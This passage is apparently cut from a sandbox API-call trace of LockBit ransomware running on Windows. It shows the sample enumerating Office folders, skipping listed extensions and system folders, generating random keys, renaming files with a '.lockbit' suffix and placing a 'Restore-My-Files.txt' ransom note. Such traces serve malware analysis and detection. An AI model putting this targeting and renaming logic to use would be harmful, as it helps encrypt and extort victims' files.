(lpString1=".sdb", lpString2=".thmx") returned -1 [0196.189] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0196.189] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0196.189] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0196.189] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0196.189] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0196.190] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0196.190] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Verve.thmx.lockbit") returned 72 [0196.190] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Verve.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\verve.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0196.190] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.190] malloc (_Size=0x40068) returned 0x3e70008 [0196.191] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=75264) returned 1 [0196.191] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.191] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0196.191] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.192] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0196.206] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0196.208] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Verve.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Verve.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.208] malloc (_Size=0xa6) returned 0x1fa2ed8 [0196.208] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0196.209] free (_Block=0x1fa2ed8) [0196.209] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Verve.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0196.210] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0196.210] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.210] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d03f100, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5cd5260, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x5d03f100, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x2c681, dwReserved0=0x0, dwReserved1=0x0, cFileName="Waveform.thmx", cAlternateFileName="WAVEFO~1.THM")) returned 1 [0196.210] lstrcmpiW (lpString1=".", lpString2="Waveform.thmx") returned -1 [0196.210] lstrcmpiW (lpString1="..", lpString2="Waveform.thmx") returned -1 [0196.210] PathFindExtensionW (pszPath="Waveform.thmx") returned=".thmx" [0196.210] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0196.210] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0196.210] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0196.210] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0196.210] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0196.210] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0196.210] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0196.210] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0196.210] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0196.210] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0196.210] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0196.210] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0196.210] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0196.210] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0196.210] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0196.211] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0196.211] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0196.211] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0196.211] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0196.211] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0196.211] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0196.211] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0196.211] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0196.211] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0196.211] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0196.211] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0196.211] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0196.211] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0196.211] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0196.211] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0196.211] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0196.211] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0196.211] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0196.211] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0196.211] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0196.211] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0196.211] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0196.211] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0196.211] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0196.212] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0196.212] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0196.212] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0196.212] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0196.212] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0196.212] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0196.212] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0196.212] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0196.212] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Waveform.thmx") returned -1 [0196.212] lstrcmpiW (lpString1="ntldr", lpString2="Waveform.thmx") returned -1 [0196.212] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Waveform.thmx") returned -1 [0196.212] lstrcmpiW (lpString1="bootsect.bak", lpString2="Waveform.thmx") returned -1 [0196.212] lstrcmpiW (lpString1="autorun.inf", lpString2="Waveform.thmx") returned -1 [0196.212] lstrcmpiW (lpString1="thumbs.db", lpString2="Waveform.thmx") returned -1 [0196.212] lstrcmpiW (lpString1="iconcache.db", lpString2="Waveform.thmx") returned -1 [0196.212] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0196.212] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Waveform.thmx") returned=".thmx" [0196.212] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0196.212] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0196.212] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0196.212] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0196.212] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0196.212] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0196.212] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0196.213] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0196.213] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0196.213] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0196.213] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0196.213] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0196.213] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0196.213] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0196.213] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0196.213] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0196.213] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0196.213] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0196.213] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0196.213] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0196.213] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0196.213] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0196.213] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0196.213] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0196.213] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0196.213] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0196.213] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0196.213] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0196.213] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Waveform.thmx.lockbit") returned 75 [0196.213] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Waveform.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\waveform.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0196.219] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.219] malloc (_Size=0x40068) returned 0x3df0008 [0196.219] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=181889) returned 1 [0196.219] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.219] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.219] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.219] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.220] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.220] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.220] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.222] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Waveform.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Waveform.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.222] malloc (_Size=0xac) returned 0x1fa2ed8 [0196.222] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xac, FileInformationClass=0xa) returned 0x0 [0196.224] free (_Block=0x1fa2ed8) [0196.224] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Waveform.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0196.224] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0196.224] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.224] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d03f100, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5cd5260, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x5d03f100, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x2c681, dwReserved0=0x0, dwReserved1=0x0, cFileName="Waveform.thmx", cAlternateFileName="WAVEFO~1.THM")) returned 0 [0196.224] FindClose (in: hFindFile=0x55fdf8 | out: hFindFile=0x55fdf8) returned 1 [0196.224] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d851750, ftCreationTime.dwHighDateTime=0x1d5d526, ftLastAccessTime.dwLowDateTime=0xb0b3250, ftLastAccessTime.dwHighDateTime=0x1d5b4ae, ftLastWriteTime.dwLowDateTime=0xb0b3250, ftLastWriteTime.dwHighDateTime=0x1d5b4ae, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="edcsvr.exe", cAlternateFileName="")) returned 1 [0196.224] lstrcmpiW (lpString1=".", lpString2="edcsvr.exe") returned -1 [0196.224] lstrcmpiW (lpString1="..", lpString2="edcsvr.exe") returned -1 [0196.224] PathFindExtensionW (pszPath="edcsvr.exe") returned=".exe" [0196.224] lstrcmpiW (lpString1=".386", lpString2=".exe") returned -1 [0196.224] lstrcmpiW (lpString1=".cmd", lpString2=".exe") returned -1 [0196.224] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0196.224] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6f65400, ftCreationTime.dwHighDateTime=0x1d58d7c, ftLastAccessTime.dwLowDateTime=0xfeabd320, ftLastAccessTime.dwHighDateTime=0x1d56b10, ftLastWriteTime.dwLowDateTime=0xfeabd320, ftLastWriteTime.dwHighDateTime=0x1d56b10, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="hrs.exe", cAlternateFileName="")) returned 1 [0196.225] lstrcmpiW (lpString1=".", lpString2="hrs.exe") returned -1 [0196.225] lstrcmpiW (lpString1="..", lpString2="hrs.exe") returned -1 [0196.225] PathFindExtensionW (pszPath="hrs.exe") returned=".exe" [0196.225] lstrcmpiW (lpString1=".386", lpString2=".exe") returned -1 [0196.225] lstrcmpiW (lpString1=".cmd", lpString2=".exe") returned -1 [0196.225] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0196.225] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MEDIA", cAlternateFileName="")) returned 1 [0196.225] lstrcmpiW (lpString1=".", lpString2="MEDIA") returned -1 [0196.225] lstrcmpiW (lpString1="..", lpString2="MEDIA") returned -1 [0196.225] lstrcmpiW (lpString1="MEDIA", lpString2="$windows.~bt") returned 1 [0196.225] lstrcmpiW (lpString1="MEDIA", lpString2="intel") returned 1 [0196.225] lstrcmpiW (lpString1="MEDIA", lpString2="msocache") returned -1 [0196.225] lstrcmpiW (lpString1="MEDIA", lpString2="$recycle.bin") returned 1 [0196.225] lstrcmpiW (lpString1="MEDIA", lpString2="$windows.~ws") returned 1 [0196.225] lstrcmpiW (lpString1="MEDIA", lpString2="tor browser") returned -1 [0196.225] lstrcmpiW (lpString1="MEDIA", lpString2="boot") returned 1 [0196.225] lstrcmpiW (lpString1="MEDIA", lpString2="system volume information") returned -1 [0196.225] lstrcmpiW (lpString1="MEDIA", lpString2="perflogs") returned -1 [0196.225] lstrcmpiW (lpString1="MEDIA", lpString2="google") returned 1 [0196.225] lstrcmpiW (lpString1="MEDIA", lpString2="application data") returned 1 [0196.225] lstrcmpiW (lpString1="MEDIA", lpString2="windows") returned -1 [0196.225] lstrcmpiW (lpString1="MEDIA", lpString2="windows.old") returned -1 [0196.225] lstrcmpiW (lpString1="MEDIA", lpString2="appdata") returned 1 [0196.225] lstrcmpiW (lpString1="MEDIA", lpString2="Windows nt") returned -1 [0196.226] lstrcmpiW (lpString1="MEDIA", lpString2="Msbuild") returned -1 [0196.226] lstrcmpiW (lpString1="MEDIA", lpString2="Microsoft") returned -1 [0196.226] lstrcmpiW (lpString1="MEDIA", lpString2="All users") returned 1 [0196.226] lstrcmpiW (lpString1="MEDIA", lpString2="mozilla") returned -1 [0196.226] lstrcmpiW (lpString1="MEDIA", lpString2="Microsoft.NET") returned -1 [0196.226] lstrcmpiW (lpString1="MEDIA", lpString2="microsoft shared") returned -1 [0196.226] lstrcmpiW (lpString1="MEDIA", lpString2="Internet Explorer") returned 1 [0196.226] lstrcmpiW (lpString1="MEDIA", lpString2="common files") returned 1 [0196.226] lstrcmpiW (lpString1="MEDIA", lpString2="opera") returned -1 [0196.226] lstrcmpiW (lpString1="MEDIA", lpString2="Windows Journal") returned -1 [0196.226] wsprintfW (in: param_1=0x3d6d178, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA") returned 40 [0196.226] wsprintfW (in: param_1=0x3d6c550, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\*") returned 42 [0196.226] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6c970, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6c970) returned 0x55fdf8 [0196.227] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0196.227] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.227] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0196.227] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0196.227] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xbd6dc020, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbd6dc020, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CAGCAT10", cAlternateFileName="")) returned 1 [0196.227] lstrcmpiW (lpString1=".", lpString2="CAGCAT10") returned -1 [0196.227] lstrcmpiW (lpString1="..", lpString2="CAGCAT10") returned -1 [0196.227] lstrcmpiW (lpString1="CAGCAT10", lpString2="$windows.~bt") returned 1 [0196.227] lstrcmpiW (lpString1="CAGCAT10", lpString2="intel") returned -1 [0196.227] lstrcmpiW (lpString1="CAGCAT10", lpString2="msocache") returned -1 [0196.227] lstrcmpiW (lpString1="CAGCAT10", lpString2="$recycle.bin") returned 1 [0196.227] lstrcmpiW (lpString1="CAGCAT10", lpString2="$windows.~ws") returned 1 [0196.227] lstrcmpiW (lpString1="CAGCAT10", lpString2="tor browser") returned -1 [0196.227] lstrcmpiW (lpString1="CAGCAT10", lpString2="boot") returned 1 [0196.227] lstrcmpiW (lpString1="CAGCAT10", lpString2="system volume information") returned -1 [0196.227] lstrcmpiW (lpString1="CAGCAT10", lpString2="perflogs") returned -1 [0196.227] lstrcmpiW (lpString1="CAGCAT10", lpString2="google") returned -1 [0196.227] lstrcmpiW (lpString1="CAGCAT10", lpString2="application data") returned 1 [0196.228] lstrcmpiW (lpString1="CAGCAT10", lpString2="windows") returned -1 [0196.228] lstrcmpiW (lpString1="CAGCAT10", lpString2="windows.old") returned -1 [0196.228] lstrcmpiW (lpString1="CAGCAT10", lpString2="appdata") returned 1 [0196.228] lstrcmpiW (lpString1="CAGCAT10", lpString2="Windows nt") returned -1 [0196.228] lstrcmpiW (lpString1="CAGCAT10", lpString2="Msbuild") returned -1 [0196.228] lstrcmpiW (lpString1="CAGCAT10", lpString2="Microsoft") returned -1 [0196.228] lstrcmpiW (lpString1="CAGCAT10", lpString2="All users") returned 1 [0196.228] lstrcmpiW (lpString1="CAGCAT10", lpString2="mozilla") returned -1 [0196.228] lstrcmpiW (lpString1="CAGCAT10", lpString2="Microsoft.NET") returned -1 [0196.228] lstrcmpiW (lpString1="CAGCAT10", lpString2="microsoft shared") returned -1 [0196.228] lstrcmpiW (lpString1="CAGCAT10", lpString2="Internet Explorer") returned -1 [0196.228] lstrcmpiW (lpString1="CAGCAT10", lpString2="common files") returned -1 [0196.228] lstrcmpiW (lpString1="CAGCAT10", lpString2="opera") returned -1 [0196.228] lstrcmpiW (lpString1="CAGCAT10", lpString2="Windows Journal") returned -1 [0196.228] wsprintfW (in: param_1=0x3d6c550, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 49 [0196.228] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\*") returned 51 [0196.228] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6bd48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6bd48) returned 0x55fe38 [0196.235] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0196.235] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xbd6dc020, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbd6dc020, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.237] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0196.237] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0196.237] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeec79e70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0196.237] lstrcmpiW (lpString1=".", lpString2="1033") returned -1 [0196.237] lstrcmpiW (lpString1="..", lpString2="1033") returned -1 [0196.237] lstrcmpiW (lpString1="1033", lpString2="$windows.~bt") returned 1 [0196.237] lstrcmpiW (lpString1="1033", lpString2="intel") returned -1 [0196.238] lstrcmpiW (lpString1="1033", lpString2="msocache") returned -1 [0196.238] lstrcmpiW (lpString1="1033", lpString2="$recycle.bin") returned 1 [0196.238] lstrcmpiW (lpString1="1033", lpString2="$windows.~ws") returned 1 [0196.238] lstrcmpiW (lpString1="1033", lpString2="tor browser") returned -1 [0196.238] lstrcmpiW (lpString1="1033", lpString2="boot") returned -1 [0196.238] lstrcmpiW (lpString1="1033", lpString2="system volume information") returned -1 [0196.238] lstrcmpiW (lpString1="1033", lpString2="perflogs") returned -1 [0196.238] lstrcmpiW (lpString1="1033", lpString2="google") returned -1 [0196.238] lstrcmpiW (lpString1="1033", lpString2="application data") returned -1 [0196.238] lstrcmpiW (lpString1="1033", lpString2="windows") returned -1 [0196.238] lstrcmpiW (lpString1="1033", lpString2="windows.old") returned -1 [0196.238] lstrcmpiW (lpString1="1033", lpString2="appdata") returned -1 [0196.238] lstrcmpiW (lpString1="1033", lpString2="Windows nt") returned -1 [0196.238] lstrcmpiW (lpString1="1033", lpString2="Msbuild") returned -1 [0196.238] lstrcmpiW (lpString1="1033", lpString2="Microsoft") returned -1 [0196.238] lstrcmpiW (lpString1="1033", lpString2="All users") returned -1 [0196.238] lstrcmpiW (lpString1="1033", lpString2="mozilla") returned -1 [0196.238] lstrcmpiW (lpString1="1033", lpString2="Microsoft.NET") returned -1 [0196.239] lstrcmpiW (lpString1="1033", lpString2="microsoft shared") returned -1 [0196.239] lstrcmpiW (lpString1="1033", lpString2="Internet Explorer") returned -1 [0196.239] lstrcmpiW (lpString1="1033", lpString2="common files") returned -1 [0196.239] lstrcmpiW (lpString1="1033", lpString2="opera") returned -1 [0196.239] lstrcmpiW (lpString1="1033", lpString2="Windows Journal") returned -1 [0196.239] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033") returned 54 [0196.239] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\*") returned 56 [0196.239] FindFirstFileExW (in: 